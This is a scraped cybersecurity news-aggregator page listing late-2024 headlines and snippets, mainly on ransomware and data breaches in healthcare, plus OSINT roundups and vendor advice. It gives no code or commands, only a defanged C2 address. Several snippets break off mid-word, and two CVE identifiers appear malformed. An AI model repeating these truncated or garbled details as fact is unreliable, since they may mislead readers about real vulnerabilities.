The convergence of IT and OT networks introduces additional risk, as attackers use traditional IT entry points to reach OT systems. Russia has been aggressively targeting Ukrainian critical infrastructure with both cyberattacks and missiles. For example, in April, Ukraine's computer emergency response team (CERT-UA) reported that [Seashell Blizzard had targeted](https://therecord.media/frostygoop-malware-ukraine-heat) nearly 20 energy facilities in Ukraine that spring, potentially to amplify the impact of intense Russian missile and drone strikes on critical infrastructure. Additionally, in May 2024, CISA issued a joint statement highlighting ongoing [pro-Russia hacktivist activity targeting ICS and small-scale OT systems](https://www.cisa.gov/resources-tools/resources/defending-ot-operations-against-ongoing-pro-russia-hacktivist-activity) across North American and European critical infrastructure sectors, including Water and Wastewater Systems, Dams, Energy, and Food and Agriculture. While these attacks often rely on unsophisticated techniques that create nuisance effects, investigations show that such actors are capable of more advanced methods against insecure and misconfigured OT environments, potentially causing physical harm.
## Detections/Hunting Queries
### Microsoft Defender Antivirus
Microsoft Defender Antivirus detects threat components as the following malware: Trojan:Win32/FrostyGoop
## References
[FrostyGoop's Zoom-In: A Closer Look into the Malware Artifacts, Behaviors and Network Communications](https://unit42.paloaltonetworks.com/frostygoop-malware-analysis/) Palo Alto Unit 42 (accessed 2024-11-19)
## Copyright
**© Microsoft 2024**. All rights reserved. Reproduction or distribution of the content of this site, or any part thereof, without written permission of Microsoft is prohibited.
Ransomware Malware Vulnerability Threat Industrial Medical ★★
bleepingcomputer.webp 2024-11-20 21:20:19 Cyberattack at French hospital exposes health data of 750,000 patients (lien direct) A data breach at an unnamed French hospital exposed the medical records of 750,000 patients after a threat actor gained access to its electronic patient record system. [...]
Data Breach Threat Medical ★★
News.webp 2024-11-20 18:01:08 Mega US healthcare payments network restores system 9 months after ransomware attack (lien direct) Change Healthcare's $2 billion recovery is still a work in progress Still reeling from its February ransomware attack, Change Healthcare confirms its clearinghouse services are back up and running, almost exactly nine months since the digital disruption began.…
Ransomware Medical ★★★
globalsecuritymag.webp 2024-11-20 11:12:50 Healthcare organisations see employees as weak link in cyber defences; workers admit they are disengaged in training (lien direct) Healthcare organisations see employees as weak link in cyber defences; workers admit they are disengaged in training - Special Reports
Medical ★★
News.webp 2024-11-20 00:30:07 Healthcare org Equinox notifies 21K patients and staff of data theft (lien direct) Ransomware scum LockBit claims it did the dirty deed Equinox, a New York State health and human services organization, has begun notifying over 21 thousand clients and staff that cyber criminals stole their health, financial, and personal information in a "data security incident" nearly seven months ago.…
Medical ★★★
IndustrialCyber.webp 2024-11-19 10:25:48 New HSCC playbook empowers medical product manufacturers to tackle cyber incidents effectively (lien direct) >The U.S. Healthcare and Public Health Sector Coordinating Council (HSCC) released the Medical Product Manufacturer Cyber Incident Response...
Medical ★★
DarkReading.webp 2024-11-18 13:38:03 DHS Releases Secure AI Framework for Critical Infrastructure (lien direct) The voluntary recommendations from the Department of Homeland Security cover how artificial intelligence should be used in the power grid, water system, air travel network, healthcare, and other pieces of critical infrastructure.
Medical ★★
RiskIQ.webp 2024-11-18 12:22:31 Weekly OSINT Highlights, 18 November 2024 (lien direct)
## Snapshot
Last week's OSINT reporting highlights a diverse array of cyber threats, including ransomware, phishing, espionage, and supply chain attacks. Key trends include evolving attack vectors like malicious .LNK files and PowerShell-based lateral movements, as seen in campaigns targeting Pakistan and other regions. Threat actors span from state-sponsored groups such as North Korea's Lazarus and China's TAG-112 to financially motivated groups like SilkSpecter, with targets including critical sectors like manufacturing, government, healthcare, and e-commerce. Information stealers emerged as a notable theme, with malware such as RustyStealer, Fickle Stealer, and PXA Stealer employing advanced obfuscation and multi-vector attacks to exfiltrate sensitive data from diverse sectors. The reports underscore sophisticated evasion tactics, the leveraging of legitimate platforms for malware delivery, and the persistent targeting of vulnerable backup and storage systems.
## Description
1. [Ymir Ransomware Attack](https://sip.security.microsoft.com/intel-explorer/articles/1444d044): Researchers at Kaspersky identified Ymir, a ransomware variant that performs operations entirely in memory and encrypts data using the ChaCha20 algorithm. Attackers used PowerShell-based lateral movement and reconnaissance tools, employing RustyStealer malware to gain initial access and steal data, targeting systems in Colombia among other regions.
1. [WIRTE Group Cyber Attacks](https://sip.security.microsoft.com/intel-explorer/articles/17c5101d): Check Point Research linked WIRTE, a Hamas-connected group, to espionage and disruptive cyber attacks in 2024, including PDF lure-driven Havoc framework deployments and SameCoin wiper campaigns targeting Israeli institutions. WIRTE, historically aligned with the Molerats, focuses on politically motivated attacks in the Middle East, showcasing ties to Gaza-based cyber activities.
1. [DoNot Group Targets Pakistani Manufacturing](https://sip.security.microsoft.com/intel-explorer/articles/25ee972c): The DoNot group launched a campaign against Pakistan's manufacturing sector, focusing on maritime and defense industries, using malicious .LNK files disguised as RTF documents to deliver stager malware via PowerShell. The campaign features advanced persistence mechanisms, updated AES encryption for C&C communications, and dynamic domain generation, highlighting their evolving evasion tactics.
1. [Election System Honeypot Findings](https://sip.security.microsoft.com/intel-explorer/articles/1a1b4eb7): Trustwave SpiderLabs' honeypot for U.S. election infrastructure recorded attacks like brute force, SQL injection, and CVE exploits by botnets including Mirai and Hajime. The attacks, largely driven by exploit frameworks and dark web collaboration, underline persistent threats against election systems.
1. [Chinese TAG-112 Tibetan Espionage](https://sip.security.microsoft.com/intel-explorer/articles/11ae4e70): In May 2024, TAG-112, suspected to be Chinese state-sponsored, compromised Tibetan community websites via Joomla vulnerabilities to deliver Cobalt Strike payloads disguised as security certificates. The campaign reflects Chinese intelligence's enduring interest in monitoring and disrupting Tibetan and other minority organizations.
1. [Phishing Campaigns Exploit Ukrainian Entities](https://sip.security.microsoft.com/intel-explorer/articles/95253614a): Russian-linked threat actor UAC-0194 targeted Ukrainian entities with phishing campaigns, exploiting CVE-2023-320462 and CVE-2023-360251 through malicious hyperlinks in emails. The attacks leveraged compromised municipal servers to host malware and facilitate privilege escalation and security bypasses.
1. [Lazarus Group's MacOS Targeting](https://sip.security.microsoft.com/intel-explorer/articles/7c6b391d): Lazarus, a North Korean threat actor, deployed RustyAttr malware targeting macOS via malicious apps using the Tauri framework, hiding payloads in Extended Attributes (EA). This campaign reflects evolvin
Ransomware Malware Tool Vulnerability Threat Prediction Medical Cloud Technical APT 41 APT 38 ★★★
no_ico.webp 2024-11-15 11:52:24 Ransomware Attacks on Healthcare Sector Surge in 2024 (lien direct) Ransomware attacks on the healthcare sector surged in 2024, analysis from SafetyDetectives reveals. The year has already seen 264 attacks on healthcare providers by September, nearly surpassing the 268 attacks recorded for all of 2023. Escalating Cyber Threats SafetyDetectives argues that the growing number of ransomware groups and variants in 2024 contributed to the increasing [...]
Ransomware Medical ★★★
AlienVault.webp 2024-11-15 07:00:00 Safeguarding Healthcare Organizations from IoMT Risks (lien direct)
The healthcare industry has undergone significant transformation with the emergence of Internet of Medical Things (IoMT) devices. These devices, ranging from wearable monitors to networked imaging systems, collect and process vast amounts of sensitive medical data on which critical decisions about patients' health are made. At the same time, they also raise serious privacy and security concerns. Cybercriminals often target vulnerabilities within these devices to gain entry into the hospital network and compromise healthcare data. Attacks on these interconnected devices can cause life-threatening harm to patients, disrupt services, and bring financial and reputational costs to medical centers. As hackers increasingly target IoMT devices and present significant threats to medical organizations, it is crucial to combat these risks and ensure patient safety.
Current Security Landscape of Medical Connected Devices
The global healthcare medical device market is expected to reach $332.67 billion by 2027. The acceleration in IoMT adoption shows that the healthcare industry has found this technology useful. However, this innovation also carries possible threats and challenges. Below is an insight into the key security challenges that these IoT devices come with:
Ransomware Attacks
Cybercriminals often target medical devices and networks to access sensitive information like protected health information (PHI) and electronic health records (EHR). They even steal this information to put it up for sale on the dark web and, in return, demand a hefty ransom. For instance, in the crippling ransomware attack against Change Healthcare, the criminal gang ALPHV/BlackCat stole 4TB of patients' records and affected one-third of people living in the USA. The stolen data was up for sale on the black market until the hackers received $22 million as a ransom payment. Such incidents erode patients' trust and cause healthcare organizations to face HIPAA violations ranging from $100 to $50,000 per violation.
Vulnerabilities Exploitation
Medical devices such as infusion pumps or pacemakers are not designed with security in mind. As a result, they may come with security vulnerabilities that hackers can exploit to get unauthorized access to medical data. For example, Nozomi Networks Labs found several security flaws within the GE Healthcare Vivid Ultrasound family that hackers can exploit to launch ransomware attacks and manipulate patients' data. Previously, Palo Alto Networks discovered 40 vulnerabilities and more than 70 security alerts in infusion pumps, putting them at risk of leaking sensitive information. Similarly, McAfee researchers identified significant vulnerabilities in two types of B. Braun infusion pumps that could enable hackers to deliver a lethal dosage of medication to unsuspecting patients. Although no affected case was reported, this event highlighted the gaps in medical device security and the need for improvement.
Outdated and Unpatched Medical Devices
Outdated systems remain a top challenge for medical IoT as healthcare organizations continue to rely on legacy systems. Many of these devices aren't designed with security in mind and stay in use for years and even decades. Device manufacturers are reluctant to upgrade the system software because it
Ransomware Malware Vulnerability Threat Patching Medical Technical ★★
IndustrialCyber.webp 2024-11-14 09:48:00 GAO highlights HHS struggles with cybersecurity as healthcare sector faces increased attacks (lien direct) >The U.S. Government Accountability Office (GAO) has identified challenges faced by the Department of Health and Human Services...
Medical ★★
IndustrialCyber.webp 2024-11-14 08:31:56 Medcrypt expands strategic partnerships to boost cybersecurity for medical devices (lien direct) >Medcrypt, a vendor of proactive security solutions for medical devices, announced an expansion of its strategic partnerships with...
Medical ★★
NIST.webp 2024-11-13 12:00:00 Digital Identities: Getting to Know the Verifiable Digital Credential Ecosystem (lien direct) If you are interested in the world of digital identities, you have probably heard some of the buzzwords that have been floating around for a few years now… “verifiable credential,” “digital wallet,” “mobile driver's license” or “mDL.” These terms, among others, all reference a growing ecosystem around what we are calling “verifiable digital credentials.” But what exactly is a verifiable digital credential? Take any physical credential you use in everyday life – your driver's license, your medical insurance card, a certification or diploma – and turn it into a digital format stored on your
Medical ★★★
IndustrialCyber.webp 2024-11-13 08:02:48 Barts Health NHS Trust selects Cynerio to boost cybersecurity across healthcare sites (lien direct) >Barts Health NHS Trust has chosen Cynerio's healthcare-focused platform for deployment across all sites. After a thorough evaluation,...
Medical ★★★
AlienVault.webp 2024-11-12 07:00:00 Building a Resilient Network Architecture: Key Trends for 2025 (lien direct) 2025 LevelBlue
As organizations continue to align their operational strategies with evolving digital ecosystems and technologies, the concept of network resilience has become a priority. A major mindset shift is that modern networks must be designed not just for speed and efficiency but also for flexibility, security, and the ability to hold out against disruptions. Whether due to an influx of remote workers, the adoption of hybrid cloud environments, or emerging cyber threats, a resilient network architecture is a necessity. Let's focus on the trends that steer businesses towards building and maintaining robust networks in 2025.
The Cloud-Native Shift
Traditional, hardware-centric networks are noticeably giving way to cloud-native architectures, and for good reason. The latter are designed from the ground up to function in cloud environments and exhibit greater flexibility, scalability, and adaptability. This transition stems from the need to scale operations quickly and efficiently while sticking to common security protocols. One major thing that makes cloud-native networks stand out is the ability to manage traffic dynamically through software-defined solutions such as SD-WAN (Software-Defined Wide Area Network). In contrast to the physical routers and switches that form the foundation of classic networks, SD-WAN can prioritize and route traffic based on real-time network conditions. This level of flexibility is an important prerequisite for supporting distributed workforces and ensuring reliable connections across multiple locations, whether in physical offices, remote locations, or the cloud. This type of architecture is also about agility in adapting to changes. If a new branch office needs to be set up, cloud-based solutions can scale the network infrastructure on demand without extensive hardware deployment, which reduces costs and implementation times.
Tighter Interplay of Networking and Security
The convergence of security and networking into unified frameworks is another significant trend. SASE (Secure Access Service Edge) represents a paradigm shift in how organizations approach network security, combining wide area networking (WAN) capabilities with security functions delivered from the cloud. This technology addresses several pain points that conventional network security designs face. Historically, defensive tools such as firewalls, VPNs, and intrusion prevention systems were scattered across different parts of the network, often leading to inefficiencies, performance bottlenecks, and gaps in security coverage. SASE integrates these functions into a single, cloud-delivered service that simplifies management and enhances network visibility.
The Growing Role of AI and ML
Artificial intelligence is a boon for network management because it automates routine tasks, predicts potential failures, and optimizes performance. Traditional approaches often rely on manual configurations and monitoring, which tend to be time-consuming and prone to errors. By automating these workflows, AI-driven tools reduce the odds of human mistakes and enable faster response to breaches. The tech can also do the heavy lifting in terms of predictive analytics. Machine learning algorithms readily identify patterns that indicate potential problems such as imminent equipment malfunctions, bandwidth congestion, or unusual traffic patterns that might signal a security breach. AI also enables dynamic network optimization. For instance, its algorithms can automatically adjust bandwidth allocation based on real-time demand to ensure that critical applications get the necessary resources without manual intervention. This adaptability is particularl
Malware Tool Prediction Medical Cloud ★★★
RiskIQ.webp 2024-11-11 18:57:29 Unpacking the Interlock Ransomware Attack (lien direct)
## Snapshot
Cisco Talos Incident Response has observed the Interlock ransomware group engaging in big-game hunting and double extortion attacks, targeting sectors such as healthcare, technology, and government in the United States and manufacturing in Europe since its emergence in September 2024.
## Description
The group employs a multi-component delivery chain, launching its attack through a compromised legitimate website that tricks victims into downloading a fake browser updater. This executable is a remote access tool (RAT) that establishes persistence, collects system information, and communicates with a command-and-control (C2) server. The attackers also use a credential stealer, a keylogger, and tools such as AnyDesk, PuTTY, and Azure Storage Explorer for lateral movement and data exfiltration. The Interlock ransomware, which has both Windows and Linux variants, encrypts files and appends the ".Interlock" extension, while avoiding encryption of certain system folders and file extensions. The Windows variant uses cipher block chaining (CBC) encryption and the Linux variant uses CBC or RSA encryption. The ransomware establishes persistence by creating a daily task and can delete itself after encryption. A ransom note is configured to display during interactive logon using Group Policy Objects, demanding a response within 96 hours to avoid data leaks and media notification.
Talos IR notes that Interlock ransomware may have connections with the operators or developers of Rhysida ransomware, suggested by similarities in tactics, techniques, and procedures (TTPs), as well as the behaviors of the ransomware encryptor binaries. Both groups use AzCopy for data exfiltration and deliver ransom notes that offer help rather than threats, indicating a trend of diversification and collaboration among ransomware groups.
## Recommendations
Microsoft recommends the following mitigations to defend against this threat:
- Keep software up to date. Apply new security patches as soon as possible.
- Turn on [cloud-delivered protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-lock-at-first-sight-microsoft-defender-asvirus?ocid=magicti_ta_learndoc) in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Enable [network protection](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide?ocid=Magicti_TA_LearnDoc).
- Run [endpoint detection and response (EDR) in block mode](https://learn.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-lock-mode?ocid=Magicti_Ta_LearnDoc) so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Configure [investigation and remediation](https://learn.microsoff on alerts to resolve breaches, significantly reducing alert volume.
- Read our [ransomware threat overview](https://security.microsoft.com/Thereatanalytics3/05658B6C-DC62-496D-AD3C-C6A795A33C27/analyStreport) for developing a holistic security posture to prevent ransomware, including hygiene of
Ransomware Malware Tool Threat Prediction Medical Cloud APT 45 ★★★
IndustrialCyber.webp 2024-11-11 17:03:05 New public health cybersecurity readiness survey to boost preparedness for cyber threats (lien direct) The co-chairs of the Joint Public Health Cybersecurity Task Group of the Healthcare and Public Health Sector Coordinating...
Medical ★★
Checkpoint.webp 2024-11-11 13:01:32 11th November - Threat Intelligence Report (lien direct) >For the latest discoveries in cyber research for the week of 11th November, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES Memorial Hospital and Manor in Bainbridge, Georgia, has been a victim of a ransomware attack that resulted in the loss of access to its electronic health record system. The Embargo ransomware gang […]
Ransomware Threat Medical ★★★
InfoSecurityMag.webp 2024-11-07 16:30:00 Interlock Ransomware Targets US Healthcare, IT and Government Sectors (lien direct) Interlock employs both “big-game hunting” and double extortion tactics against its victims
Ransomware Medical ★★
securityintelligence.webp 2024-11-07 14:00:00 Exploring DORA: How to manage ICT incidents and minimize cyber threat risks (lien direct) >As cybersecurity breaches continue to rise globally, institutions handling sensitive information are particularly vulnerable. In 2024, the average cost of a data breach in the financial sector reached $6.08 million, making it the second hardest hit after healthcare, according to IBM’s 2024 Cost of a Data Breach report. This underscores the need for robust IT […]
Data Breach Threat Medical ★★★
IndustrialCyber.webp 2024-11-07 09:47:03 ENISA hosts 9th eHealth security conference to tackle cybersecurity challenges in healthcare (lien direct) >The European Union Agency for Cybersecurity (ENISA) is hosting the 9th eHealth Security Conference in partnership with Hungary’s...
Medical Conference ★★★
ProofPoint.webp 2024-11-07 07:18:44 Cybersecurity Stop of the Month: Preventing Vendor Email Compromise in the Public Sector (lien direct)
The Cybersecurity Stop of the Month blog series explores the ever-evolving tactics of today's cybercriminals. It also examines how Proofpoint helps businesses to fortify their email defenses to protect people against today's emerging threats.
The interconnectedness of today's business ecosystems has created a prime target for attacks on digital supply chains. Within those supply chains, email remains the No.1 vector to access people and poses a major risk. According to our research, more than 80% of Proofpoint customers receive an email attack each month from a trusted vendor or supplier. And these attacks can be quite costly. Based on IBM's Cost of a Data Breach report, the average financial loss from a data breach that involves the supply chain tops $4.8 million.
Unlike native and API-based email security tools, Proofpoint regularly stops these highly targeted attacks before they reach employee inboxes. If you've been following this series, you will have seen in earlier blog posts that we've covered many different types of supply chain attacks. We've seen attackers targeting the legal, manufacturing, aviation industries and more with complex impersonation and vendor email compromise techniques.
Today, we'll explore a phishing attack on a public sector agency, which was disguised as an electronic fax (eFax).
Background
In this example, bad actors exploited a supplier's email through vendor email compromise. This occurs when an attacker gains access to and weaponizes an email account of a smaller business partner instead of going directly after a bigger, more secure organization. This can be a very effective tactic. Attackers know that larger organizations typically have better resources, bigger budgets and more mature cybersecurity defenses to keep them out.
When this tactic is combined with credential phishing, attackers are able to trick even the savviest recipients. In fact, Proofpoint research shows that employees are 3X more likely to click on a phishing link when it comes from a trusted partner. That's not only because there's an inherent trust between senders. It's also due to the fact that threat actors may use legitimate file hosting services and extremely convincing fake login sites to spoof well-known brands.
The scenario
Proofpoint recently detected this potent combination of threats during a customer's initial evaluation process. This threat was started by a cybercriminal who gained access to the email account of a marketing professor at a public university. With this access, the attacker sent a phishing link, which appeared to be an eFax, to the email address of a government agency's employee whom the university professor had previously communicated with. Because the employee was a known contact in the professor's inbox, the attacker was able to bypass many layers of security intended to catch such threats.
As with many vendor email compromise attacks, this threat was specific, highly targeted and unique to the sender. Because Proofpoint has extensive global email visibility and insights, we were able to see that the same phishing link was delivered to fewer than 40 other accounts worldwide.
Notably, the phishing link was hosted by a legitimate, well-known file sharing website. As a result, it was missed by this agency's Microsoft 365 native email security tool, which lacks comprehensive URL sandboxing capabilities. And because of the extended nature of this attack chain, it was further missed by an API-based security tool after it was delivered.
Fortunately, Proofpoint detects and blocks phishing messages before they ever reach a user's inbox. If this customer had been using Proofpoint, its employees would never have been exposed to the account takeover risk.
The threat: How did the attack happen?
Here's a breakdown of the attack.
1. Setting a lure. To set the trap, the attacker created a highly stylized message that looked like an
Data Breach Malware Tool Threat Medical Cloud ★★
globalsecuritymag.webp 2024-11-05 08:54:11 Healthcare; Overcome your legacy systems challenges to enhance cybersecurity, says Espria
Healthcare organisations must adopt a proactive approach by leveraging advanced technologies. - Opinion
Medical ★★★
RiskIQ.webp 2024-11-04 12:25:16 Weekly OSINT Highlights, 4 November 2024
## Snapshot
Last week's OSINT reports highlighted both state-sponsored and cybercriminal threat activity, with diverse attack vectors and targets across sectors. APT actors in North Korea, China and Russia ran targeted phishing, network intrusion and malware campaigns. North Korean and Russian groups favoured credential theft and ransomware tactics against sectors from government to military, while Chinese actors exploited firewall vulnerabilities to gain long-term access in high-stakes sectors. Meanwhile, cybercriminals leveraged social engineering, vishing, and IoT and plugin vulnerabilities to infiltrate cloud environments, IoT devices and Android systems. The emphasis on exploiting vulnerabilities in popular software and web platforms underscores these threat actors' adaptability as they extend their attack reach, particularly in the use of cloud, virtualization and cryptomining strategies across a range of industries.
## Description
1. [Jumpy Pisces Ransomware Collaboration](https://sip.security.microsoft.com/intel-explorer/articles/393b61a9): Unit 42 reported that North Korea's Jumpy Pisces (Onyx Sleet) partnered with Play ransomware in a financially motivated attack targeting unspecified organizations. The threat actor used tools such as Sliver, Dtrack and PsExec to gain persistence and escalate privileges, culminating in the deployment of Play ransomware.
1. [Chinese Threats Targeting Firewalls](https://sip.security.microsoft.com/intel-explorer/articles/798c0fdb): Sophos X-Ops identified China-based groups such as Volt Typhoon, APT31 and APT41 exploiting firewalls to gain access across the Pacific. These groups use sophisticated techniques such as living off the land and cross-platform rootkits.
1. [Phishing Campaign on the Naver Platform](https://sip.security.microsoft.com/intel-explorer/articles/dfee0ab5): North Korea-linked actors launched a phishing campaign targeting South Korea's Naver, attempting to steal login credentials through multiple phishing domains. The infrastructure, with its SSL certificate changes and tracking capabilities, aligns with Kimsuky (Emerald Sleet), known for its credential theft tactics.
1. [FakeCall Vishing Malware on Android](https://sip.security.microsoft.com/intel-explorer/articles/d94c18b0): Zimperium researchers identified the vishing techniques used by the FakeCall malware to steal from Android users. The malware intercepts calls and mimics Android's dialer, allowing attackers to trick users into disclosing sensitive information.
1. [Facebook Business Phishing Campaign](https://sip.security.microsoft.com/intel-explorer/articles/82b49ffd): Cisco Talos detected a phishing attack targeting Facebook business accounts in Taiwan, using legal notices as the lure. LummaC2 and Rhadamanthys information-stealing malware were embedded in RAR files, collecting system credentials and evading detection through obfuscation and process injection.
1. [LiteSpeed Cache Vulnerability](https://sip.security.microsoft.com/intel-explorer/articles/a85b69db): a flaw in the LiteSpeed Cache plugin (CVE-2024-50550) could allow privilege escalation on more than six million sites. The exploited vulnerabilities allowed attackers to upload ma
Ransomware Malware Tool Vulnerability Threat Mobile Prediction Medical Cloud Technical APT 41 APT 28 APT 31 Guam ★★★
RiskIQ.webp 2024-11-01 19:56:31 GreyNoise Intelligence Discovers Zero-Day Vulnerabilities in Live Streaming Cameras with the Help of AI
#### Targeted Industries
- Government Agencies & Services
- General Public Services - Local
- General Public Services - State
- Healthcare & Public Health
- Critical Manufacturing
- Non-Governmental Organization
- Religious Organization
## Snapshot
GreyNoise discovered serious zero-day vulnerabilities in popular live-streaming IoT cameras, highlighting significant risks in manufacturing, healthcare, business, government and other sensitive sectors.
## Description
By exploiting these flaws, attackers could take full control of affected cameras, manipulate video feeds, disable the devices or co-opt them into botnets for broader attacks. The vulnerabilities, tracked as [CVE-2024-8956](https://security.microsoft.com/intel-explorer/cves/cve-2024-8956/) and [CVE-2024-8957](https://security.microsoft.com/intel-explorer/cves/cve-2024-8957/), affect NDI-enabled pan-tilt-zoom (PTZ) cameras used in applications where reliability and privacy are essential. With insufficient authentication (CVE-2024-8956) and command injection flaws (CVE-2024-8957), attackers can access sensitive data, reconfigure or disable the cameras and conduct unauthorized surveillance. This exposes businesses to potential data breaches, privacy invasions and even ransomware attacks, as compromised cameras could enable broader network intrusions. In industrial settings, such breaches could affect machine monitoring and quality control, while in healthcare they could compromise telehealth and surgical live streams.
These vulnerabilities highlight a growing cybersecurity challenge in IoT ecosystems, where insecure designs leave devices susceptible to exploitation. Attackers can pivot from these cameras to target other networked devices, leading to broader data breaches or ransomware attacks.
## Recommendations
GreyNoise recommends that organizations using the VHD PTZ camera firmware
Ransomware Vulnerability Threat Industrial Medical ★★
Checkpoint.webp 2024-11-01 13:00:39 Ransomware's Evolving Threat: The Rise of RansomHub, Decline of Lockbit, and the New Era of Data Extortion
Ransomware Threat Industrial Medical ★★★
DarkReading.webp 2024-11-01 01:53:28 The Overlooked Importance of Identifying Riskiest Users
"See one, teach one, do one" takes a page out of the healthcare playbook to reduce human vulnerabilities where they matter most in cybersecurity.
Vulnerability Medical ★★
SecureMac.webp 2024-10-31 19:00:00 Checklist 398: The More Things Change…
Change Healthcare's breach prompts calls for credit freezes and offers 2 years of free monitoring, as experts urge stronger steps to prevent identity theft.
Medical ★★
Chercheur.webp 2024-10-30 13:34:08 Change Healthcare Breach Hits 100M Americans
Change Healthcare says it has notified approximately 100 million Americans that their personal, financial and healthcare records may have been stolen in a February 2024 ransomware attack that caused the largest ever known data breach of protected health information.
Ransomware Data Breach Medical ★★
IndustrialCyber.webp 2024-10-30 13:02:32 Forescout Research reveals 162 vulnerabilities in connected medical devices, elevating risks to patient data and safety
New research from Forescout Technologies highlighted the most vulnerable connected medical devices, uncovering 162 security vulnerabilities that could...
Vulnerability Medical ★★
globalsecuritymag.webp 2024-10-29 13:43:36 Hospitals: When Cybercriminals Drive Up the Mortality Rate - Proofpoint Report
Corbeil-Essonnes, Brest, or Versailles: there is no shortage of examples of cyberattacks against healthcare organizations. Last May, the ANS reported 581 IT incidents in French hospitals and medico-social establishments in 2023, more than half of which involved cyberattacks, and nearly 60 of which resulted in a leak of personal and sensitive data. But France is not the only example in the sector; the latest Proofpoint report "Cyber (...) - Malware
Medical ★★
securityintelligence.webp 2024-10-29 13:00:00 Why safeguarding sensitive data is so crucial
A data breach at virtual medical provider Confidant Health lays bare the vast difference between personally identifiable information (PII) on the one hand and sensitive data on the other. The story began when security researcher Jeremiah Fowler discovered an unsecured database containing 5.3 terabytes of exposed data linked to Confidant Health. The company provides addiction […]
Data Breach Medical ★★
News.webp 2024-10-28 22:56:39 2024-10-25 HeptaX - Unauthorized RDP Connections. Malicious LNK > PowerShell > Bat files Samples
2024-10-25 Cyble: HeptaX: Unauthorized RDP Connections for Cyberespionage Operations
Summary: The attack begins with a malicious LNK file delivered in a ZIP archive, likely distributed through phishing emails, and appears to target the healthcare industry. On execution, the LNK file launches a PowerShell command that downloads several scripts and batch files from a remote server to establish persistence and control over the victim's system. The LNK file, once opened, triggers PowerShell commands that download additional payloads from hxxp://157.173.104[.]153. These scripts allow the attacker to create a new user account with administrative privileges and alter RDP settings, lowering authentication requirements for easier unauthorized access. A persistent shortcut file (LNK) is created in the Windows Startup folder to maintain access. The main PowerShell script communicates with the C2 server, building URLs with a unique identifier (UID) for the compromised machine to retrieve commands or additional payloads. If UAC is detected as low or disabled, the attack proceeds to further steps that lower the system's security configuration. A secondary payload, "ChromePass", is introduced, targeting Chromium-based browsers to harvest stored credentials and increasing the risk of compromised accounts. The scripts configure the system to facilitate remote access, enabling actions such as exfiltration, monitoring and installation of additional malware. Subsequent batch files (e.g., k1.bat, Scheduler-once.BAT) run commands that hide traces, delete logs and schedule tasks disguised as system operations to maintain persistence and evade detection.
The final stages involve running a PowerShell script that performs reconnaissance, collects extensive system data and sends it encoded to the C2 server.
Malware Medical ★★★
RecordedFuture.webp 2024-10-28 19:33:48 Texas county says 47,000 had SSNs, medical treatment info leaked during May cyberattack
Wichita County, Texas, issued data breach notifications about an incident in May that appears to be the work of a ransomware gang.
Ransomware Data Breach Medical ★★★
Last update at: 2025-05-10 08:53:00